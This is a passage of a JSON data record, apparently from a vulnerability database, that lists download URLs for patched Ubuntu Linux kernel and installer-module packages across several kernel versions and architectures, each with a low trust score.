        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
